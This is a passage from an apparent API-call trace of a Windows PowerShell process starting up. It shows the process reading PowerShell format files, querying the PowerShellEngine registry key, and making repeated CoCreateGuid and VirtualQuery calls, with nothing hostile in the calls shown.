	[0101.811] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x8ecb31df, Data2=0xe0c2, Data3=0x4671, Data4=([0]=0xa1, [1]=0xdd, [2]=0xe3, [3]=0x9b, [4]=0xeb, [5]=0x6e, [6]=0x98, [7]=0x5b))) returned 0x0
	[0101.812] SetErrorMode (uMode=0x1) returned 0x1
	[0101.812] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0101.812] SetErrorMode (uMode=0x1) returned 0x1
	[0101.812] GetFileType (hFile=0x334) returned 0x1
	[0101.813] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.813] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.814] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.814] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.814] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.815] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.815] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.815] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.815] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.816] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.816] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.816] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.816] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.816] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.816] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.817] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.817] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.818] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.818] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.818] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.818] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.818] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0xe67, lpOverlapped=0x0) returned 1
	[0101.819] ReadFile (in: hFile=0x334, lpBuffer=0x39e9837, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39e9837*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0101.819] ReadFile (in: hFile=0x334, lpBuffer=0x39ea268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x39ea268*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0101.819] SetErrorMode (uMode=0x1) returned 0x1
	[0101.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0101.819] SetErrorMode (uMode=0x1) returned 0x1
	[0101.819] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x334) returned 0x0
	[0101.819] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0101.819] CoTaskMemAlloc (cb=0x5a) returned 0x28a760
	[0101.819] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x28a760, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0101.819] CoTaskMemFree (pv=0x28a760) 
	[0101.819] RegCloseKey (hKey=0x334) returned 0x0
	[0101.823] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x465dd6b1, Data2=0xb3ac, Data3=0x4530, Data4=([0]=0x82, [1]=0xc3, [2]=0x1d, [3]=0x92, [4]=0x4e, [5]=0x80, [6]=0x31, [7]=0x61))) returned 0x0
	[0101.823] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x723a37f4, Data2=0x6e51, Data3=0x41ae, Data4=([0]=0xaf, [1]=0xa9, [2]=0x2b, [3]=0x80, [4]=0xd5, [5]=0x19, [6]=0x53, [7]=0x38))) returned 0x0
	[0101.823] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3e33c920, Data2=0x99b7, Data3=0x48b7, Data4=([0]=0x8d, [1]=0xdb, [2]=0x79, [3]=0xce, [4]=0x7d, [5]=0x28, [6]=0x4c, [7]=0xbd))) returned 0x0
	[0101.823] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x855cd777, Data2=0x9ed5, Data3=0x410c, Data4=([0]=0x87, [1]=0xdc, [2]=0xd7, [3]=0xe5, [4]=0xdb, [5]=0xf4, [6]=0x60, [7]=0xe))) returned 0x0
	[0101.823] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xbe6689fb, Data2=0x18b9, Data3=0x4524, Data4=([0]=0xb5, [1]=0xf8, [2]=0x6, [3]=0x29, [4]=0xf5, [5]=0x9b, [6]=0x71, [7]=0xd4))) returned 0x0
	[0101.824] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3c56d323, Data2=0x13b4, Data3=0x44ff, Data4=([0]=0x8a, [1]=0x12, [2]=0x1b, [3]=0xfb, [4]=0xd1, [5]=0xf8, [6]=0x51, [7]=0x23))) returned 0x0
	[0101.824] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3deba20a, Data2=0x3116, Data3=0x4474, Data4=([0]=0x95, [1]=0xd5, [2]=0x31, [3]=0xb7, [4]=0x7, [5]=0x1c, [6]=0xaa, [7]=0x66))) returned 0x0
	[0101.824] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.824] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3f3eb0f0, Data2=0x515e, Data3=0x4c6c, Data4=([0]=0x99, [1]=0x47, [2]=0x53, [3]=0x8b, [4]=0xb2, [5]=0xdd, [6]=0x6a, [7]=0xf0))) returned 0x0
	[0101.824] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x1858716a, Data2=0x41, Data3=0x4183, Data4=([0]=0xab, [1]=0x4b, [2]=0x55, [3]=0xdf, [4]=0x25, [5]=0xb0, [6]=0x85, [7]=0x56))) returned 0x0
	[0101.825] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xebc0b371, Data2=0xe6c9, Data3=0x4192, Data4=([0]=0x9a, [1]=0xd6, [2]=0x7c, [3]=0x8c, [4]=0xe6, [5]=0x51, [6]=0x18, [7]=0x9d))) returned 0x0
	[0101.825] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x55d65db7, Data2=0xa286, Data3=0x41da, Data4=([0]=0xaa, [1]=0x29, [2]=0x82, [3]=0x1d, [4]=0x33, [5]=0x49, [6]=0x2f, [7]=0xca))) returned 0x0
	[0101.825] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2ee56e7f, Data2=0x2c21, Data3=0x48b6, Data4=([0]=0xb9, [1]=0x78, [2]=0xeb, [3]=0xb3, [4]=0x8c, [5]=0x61, [6]=0xeb, [7]=0x85))) returned 0x0
	[0101.825] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x294d0c9e, Data2=0x6d00, Data3=0x424e, Data4=([0]=0x93, [1]=0xb3, [2]=0x3b, [3]=0x98, [4]=0xd1, [5]=0x70, [6]=0xab, [7]=0x6a))) returned 0x0
	[0101.825] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x801e2bd7, Data2=0xbddd, Data3=0x4e2a, Data4=([0]=0x90, [1]=0xf0, [2]=0xdf, [3]=0x76, [4]=0xa1, [5]=0xd7, [6]=0x5d, [7]=0x91))) returned 0x0
	[0101.826] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x860b3005, Data2=0x2971, Data3=0x4824, Data4=([0]=0xb5, [1]=0x76, [2]=0x2, [3]=0xb9, [4]=0xc5, [5]=0xc6, [6]=0xd2, [7]=0x9c))) returned 0x0
	[0101.826] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xc78258a6, Data2=0x5a64, Data3=0x40bc, Data4=([0]=0x93, [1]=0xa9, [2]=0x5e, [3]=0x85, [4]=0x37, [5]=0xc8, [6]=0x2a, [7]=0xd0))) returned 0x0
	[0101.826] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x5803e3bf, Data2=0xf498, Data3=0x4d5b, Data4=([0]=0x86, [1]=0xb8, [2]=0xae, [3]=0x34, [4]=0x1f, [5]=0xa7, [6]=0x44, [7]=0x4))) returned 0x0
	[0101.826] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xda5a1225, Data2=0xfd2a, Data3=0x4627, Data4=([0]=0x9d, [1]=0x5d, [2]=0xa5, [3]=0x6b, [4]=0xf, [5]=0xfd, [6]=0x58, [7]=0x81))) returned 0x0
	[0101.826] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xe4454f3b, Data2=0x3357, Data3=0x45f2, Data4=([0]=0x8d, [1]=0x29, [2]=0xf9, [3]=0x37, [4]=0x3c, [5]=0x5, [6]=0x38, [7]=0x63))) returned 0x0
	[0101.827] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.827] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.827] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.827] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xb378112d, Data2=0x8248, Data3=0x45bf, Data4=([0]=0x80, [1]=0x82, [2]=0x14, [3]=0xf8, [4]=0x36, [5]=0x0, [6]=0x5d, [7]=0xf7))) returned 0x0
	[0101.827] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3bb9d79, Data2=0x374a, Data3=0x458e, Data4=([0]=0xaa, [1]=0x4b, [2]=0x46, [3]=0x1a, [4]=0x25, [5]=0x3b, [6]=0xf0, [7]=0xe6))) returned 0x0
	[0101.828] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x52a093cb, Data2=0x4287, Data3=0x4f3b, Data4=([0]=0x8d, [1]=0x4c, [2]=0x54, [3]=0xec, [4]=0x33, [5]=0x76, [6]=0x3e, [7]=0xca))) returned 0x0
	[0101.828] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xcf9490b4, Data2=0x4bb8, Data3=0x45d7, Data4=([0]=0x8f, [1]=0x50, [2]=0x85, [3]=0x16, [4]=0x21, [5]=0x56, [6]=0x3d, [7]=0x64))) returned 0x0
	[0101.828] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x92902562, Data2=0xffe0, Data3=0x416c, Data4=([0]=0x99, [1]=0x5a, [2]=0x6d, [3]=0x5d, [4]=0xbe, [5]=0xad, [6]=0xda, [7]=0x36))) returned 0x0
	[0101.828] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xb6b4db4a, Data2=0x528c, Data3=0x4d05, Data4=([0]=0x9e, [1]=0x28, [2]=0xf6, [3]=0xf0, [4]=0x6f, [5]=0x2f, [6]=0x81, [7]=0x4f))) returned 0x0
	[0101.829] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xc3ee1710, Data2=0xc7aa, Data3=0x48ba, Data4=([0]=0x81, [1]=0x62, [2]=0x8d, [3]=0xbd, [4]=0x1c, [5]=0x31, [6]=0xf4, [7]=0xdb))) returned 0x0
	[0101.829] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x32609026, Data2=0x693e, Data3=0x41b2, Data4=([0]=0x97, [1]=0x72, [2]=0x5d, [3]=0x38, [4]=0x38, [5]=0xae, [6]=0xa4, [7]=0x48))) returned 0x0
	[0101.829] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x9c61bff2, Data2=0x2a9f, Data3=0x4255, Data4=([0]=0xb1, [1]=0xa5, [2]=0xae, [3]=0xbf, [4]=0x20, [5]=0x71, [6]=0x30, [7]=0xcd))) returned 0x0
	[0101.829] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xa973a7a2, Data2=0x52a0, Data3=0x4165, Data4=([0]=0x90, [1]=0x68, [2]=0x9d, [3]=0x84, [4]=0xb9, [5]=0x62, [6]=0x6d, [7]=0x75))) returned 0x0
	[0101.829] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x6f218010, Data2=0xfa6c, Data3=0x45cc, Data4=([0]=0x95, [1]=0x73, [2]=0xf9, [3]=0x19, [4]=0xd5, [5]=0x7b, [6]=0x14, [7]=0x33))) returned 0x0
	[0101.830] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xf5b6ce55, Data2=0x65f6, Data3=0x4361, Data4=([0]=0x8b, [1]=0x71, [2]=0xfb, [3]=0xbf, [4]=0xcc, [5]=0xcd, [6]=0xb5, [7]=0xd0))) returned 0x0
	[0101.830] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3aea043d, Data2=0xeea1, Data3=0x4e3a, Data4=([0]=0x83, [1]=0x5e, [2]=0x4, [3]=0xfd, [4]=0xe, [5]=0xa8, [6]=0x2f, [7]=0x1e))) returned 0x0
	[0101.830] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.830] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xeeb5078c, Data2=0xb55c, Data3=0x4eea, Data4=([0]=0x84, [1]=0xed, [2]=0xda, [3]=0x48, [4]=0x72, [5]=0x3a, [6]=0x5, [7]=0x4d))) returned 0x0
	[0101.831] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.832] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.835] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x479a3d20, Data2=0xae77, Data3=0x4954, Data4=([0]=0x81, [1]=0x8c, [2]=0x48, [3]=0x3a, [4]=0x80, [5]=0xa7, [6]=0x4c, [7]=0xca))) returned 0x0
	[0101.835] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.835] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x527d16c, Data2=0xffc7, Data3=0x4f9e, Data4=([0]=0x88, [1]=0x8c, [2]=0x39, [3]=0xda, [4]=0x15, [5]=0x4a, [6]=0x2a, [7]=0x1d))) returned 0x0
	[0101.836] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xf6d30e0d, Data2=0x1871, Data3=0x4a8c, Data4=([0]=0xa6, [1]=0xbd, [2]=0x51, [3]=0xcb, [4]=0xd0, [5]=0xc, [6]=0x49, [7]=0x8b))) returned 0x0
	[0101.836] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xb77b34cf, Data2=0x68b1, Data3=0x41f1, Data4=([0]=0x99, [1]=0x26, [2]=0x81, [3]=0x3d, [4]=0x61, [5]=0x1d, [6]=0x94, [7]=0x53))) returned 0x0
	[0101.836] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xce6d753d, Data2=0x4b01, Data3=0x42f7, Data4=([0]=0x9c, [1]=0x58, [2]=0xef, [3]=0xed, [4]=0xb3, [5]=0x6, [6]=0xda, [7]=0xfb))) returned 0x0
	[0101.836] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xc2872772, Data2=0x9daa, Data3=0x4dbd, Data4=([0]=0x82, [1]=0x5, [2]=0x3f, [3]=0xf3, [4]=0x3b, [5]=0x9c, [6]=0x52, [7]=0x65))) returned 0x0
	[0101.837] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x31c68551, Data2=0xcdf7, Data3=0x4c92, Data4=([0]=0xaf, [1]=0x92, [2]=0x31, [3]=0xc9, [4]=0xfc, [5]=0x37, [6]=0xed, [7]=0x80))) returned 0x0
	[0101.837] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x5068ccab, Data2=0x64ce, Data3=0x47c9, Data4=([0]=0x85, [1]=0xda, [2]=0xa, [3]=0x22, [4]=0xf3, [5]=0x79, [6]=0x2b, [7]=0xa5))) returned 0x0
	[0102.036] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0102.037] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xab9227ea, Data2=0x95bc, Data3=0x4b66, Data4=([0]=0x8f, [1]=0xc8, [2]=0x1c, [3]=0x78, [4]=0x5e, [5]=0x4a, [6]=0xa0, [7]=0xff))) returned 0x0
	[0102.037] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xe39a3913, Data2=0x1dbd, Data3=0x43aa, Data4=([0]=0x91, [1]=0xf4, [2]=0x60, [3]=0x8e, [4]=0x81, [5]=0xc8, [6]=0x26, [7]=0xc2))) returned 0x0
	[0102.038] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xa7493af8, Data2=0x7e58, Data3=0x4b14, Data4=([0]=0x92, [1]=0x36, [2]=0x1, [3]=0x21, [4]=0xec, [5]=0x61, [6]=0xd, [7]=0x88))) returned 0x0
	[0102.038] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x1f63bbd6, Data2=0x8551, Data3=0x4adf, Data4=([0]=0xba, [1]=0x84, [2]=0x96, [3]=0xcf, [4]=0xff, [5]=0x28, [6]=0xcd, [7]=0x41))) returned 0x0
	[0102.038] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xf7b654d3, Data2=0x329b, Data3=0x4e03, Data4=([0]=0xb0, [1]=0x5a, [2]=0x99, [3]=0x74, [4]=0x45, [5]=0x3f, [6]=0x18, [7]=0x88))) returned 0x0
	[0102.038] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0102.038] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3c8ebe3f, Data2=0x70f1, Data3=0x4ce2, Data4=([0]=0x9f, [1]=0xe9, [2]=0x20, [3]=0x29, [4]=0x3f, [5]=0x7d, [6]=0x85, [7]=0x6a))) returned 0x0
	[0102.039] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x860d41b1, Data2=0x132b, Data3=0x46e5, Data4=([0]=0xa8, [1]=0x6, [2]=0x10, [3]=0x13, [4]=0xdb, [5]=0x1d, [6]=0x2f, [7]=0x63))) returned 0x0
	[0102.039] VirtualQuery (in: lpAddress=0xebf30, lpBuffer=0xecdf0, dwLength=0x30 | out: lpBuffer=0xecdf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0102.039] VirtualQuery (in: lpAddress=0xebf30, lpBuffer=0xecdf0, dwLength=0x30 | out: lpBuffer=0xecdf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0102.039] VirtualQuery (in: lpAddress=0xebf30, lpBuffer=0xecdf0, dwLength=0x30 | out: lpBuffer=0xecdf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0102.039] VirtualQuery (in: lpAddress=0xebf30, lpBuffer=0xecdf0, dwLength=0x30 | out: lpBuffer=0xecdf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0102.040] SetErrorMode (uMode=0x1) returned 0x1
	[0102.040] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0102.040] SetErrorMode (uMode=0x1) returned 0x1
	[0102.040] GetFileType (hFile=0x334) returned 0x1
	[0102.052] ReadFile (in: hFile=0x334, lpBuffer=0x3b48200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b48200*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
